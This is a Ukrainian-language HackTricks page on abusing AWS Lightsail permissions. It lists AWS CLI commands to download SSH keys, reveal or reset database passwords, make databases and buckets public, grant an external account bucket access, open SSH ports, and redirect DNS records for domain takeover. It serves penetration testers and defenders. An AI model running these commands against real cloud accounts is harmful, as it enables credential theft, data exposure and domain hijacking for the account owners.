AWS - Lightsail Privesc

Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)!

Інші способи підтримки HackTricks:

Lightsail

Для отримання додаткової інформації про Lightsail перегляньте:

pageAWS - Lightsail Enum

Важливо зауважити, що Lightsail не використовує ролі IAM, які належать користувачеві, але належать керованому обліковому запису AWS, тому ви не можете використовувати цей сервіс для підвищення привілеїв. Однак, чутлива інформація, така як код, ключі API та інформація про базу даних, може бути знайдена в цьому сервісі.

lightsail:DownloadDefaultKeyPair

Ця дозвіл дозволить вам отримати SSH-ключі для доступу до екземплярів:

aws lightsail download-default-key-pair

Потенційний вплив: Знайти чутливу інформацію всередині екземплярів.

lightsail:GetInstanceAccessDetails

Ця дозвіл дозволить вам генерувати SSH-ключі для доступу до екземплярів:

aws lightsail get-instance-access-details --instance-name <instance_name>

Потенційний вплив: Знайти чутливу інформацію всередині екземплярів.

lightsail:CreateBucketAccessKey

Ця дозвіл дозволить вам отримати ключ для доступу до відра:

aws lightsail create-bucket-access-key --bucket-name <name>

Потенційний вплив: Знайти чутливу інформацію всередині сховища.

lightsail:GetRelationalDatabaseMasterUserPassword

Ця дозвіл дозволить вам отримати облікові дані для доступу до бази даних:

aws lightsail get-relational-database-master-user-password --relational-database-name <name>

Потенційний вплив: Знайти чутливу інформацію в базі даних.

lightsail:UpdateRelationalDatabase

Ця дозвіл дозволить вам змінити пароль для доступу до бази даних:

aws lightsail update-relational-database --relational-database-name <name> --master-user-password <strong_new_password>

Якщо база даних не є публічною, ви також можете зробити її публічною з цими дозволами за допомогою

aws lightsail update-relational-database --relational-database-name <name> --publicly-accessible

Потенційний вплив: Знайти чутливу інформацію всередині бази даних.

lightsail:OpenInstancePublicPorts

Ця дозвіл дозволяє відкривати порти до Інтернету.

aws lightsail open-instance-public-ports \
--instance-name MEAN-2 \
--port-info fromPort=22,protocol=TCP,toPort=22

Потенційний вплив: Доступ до чутливих портів.

lightsail:PutInstancePublicPorts

Ця дозвіл дозволяє відкривати порти до Інтернету. Зверніть увагу, що виклик закриє будь-який відкритий порт, який не вказаний в ньому.

aws lightsail put-instance-public-ports \
--instance-name MEAN-2 \
--port-infos fromPort=22,protocol=TCP,toPort=22

Потенційний вплив: Доступ до чутливих портів.

lightsail:SetResourceAccessForBucket

Ці дозволи дозволяють надавати інстанціям доступ до відра без будь-яких додаткових облікових записів

```bash aws set-resource-access-for-bucket \ --resource-name \ --bucket-name \ --access allow ``` **Потенційний вплив:** Потенційний новий доступ до відра з чутливою інформацією.

lightsail:UpdateBucket

З цим дозволом атакувальник може надати своєму власному обліковому запису AWS доступ на читання відер або навіть зробити відра загальнодоступними для всіх:

# Grant read access to exterenal account
aws update-bucket --bucket-name <value> --readonly-access-accounts <external_account>

# Grant read to the public
aws update-bucket --bucket-name <value> --access-rules getObject=public,allowPublicOverrides=true

# Bucket private but single objects can be public
aws update-bucket --bucket-name <value> --access-rules getObject=private,allowPublicOverrides=true

Потенційний вплив: Потенційний новий доступ до відра з чутливою інформацією.

lightsail:UpdateContainerService

З цими дозволами зловмисник може надати доступ до приватних ECR зі служби контейнерів

aws update-container-service \
--service-name <name> \
--private-registry-access ecrImagePullerRole={isActive=boolean}

Потенційний вплив: Отримання чутливої інформації з приватного ECR

lightsail:CreateDomainEntry

Зловмисник з цим дозволом може створити піддомен та спрямувати його на свою власну IP-адресу (захоплення піддомену), або створити запис SPF, який дозволить йому підробляти електронні листи від домену, або навіть встановити головний домен на свою власну IP-адресу.

aws lightsail create-domain-entry \
--domain-name example.com \
--domain-entry name=dev.example.com,type=A,target=192.0.2.0

Потенційний вплив: Захоплення домену

lightsail:UpdateDomainEntry

Зловмисник з цим дозволом може створити піддомен та спрямувати його на свою власну IP-адресу (захоплення піддомену), або створити запис SPF, який дозволить йому підробляти електронні листи від домену, або навіть встановити головний домен на свою власну IP-адресу.

aws lightsail update-domain-entry \
--domain-name example.com \
--domain-entry name=dev.example.com,type=A,target=192.0.2.0

Потенційний вплив: Захоплення домену

Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)!

Інші способи підтримки HackTricks:

Last updated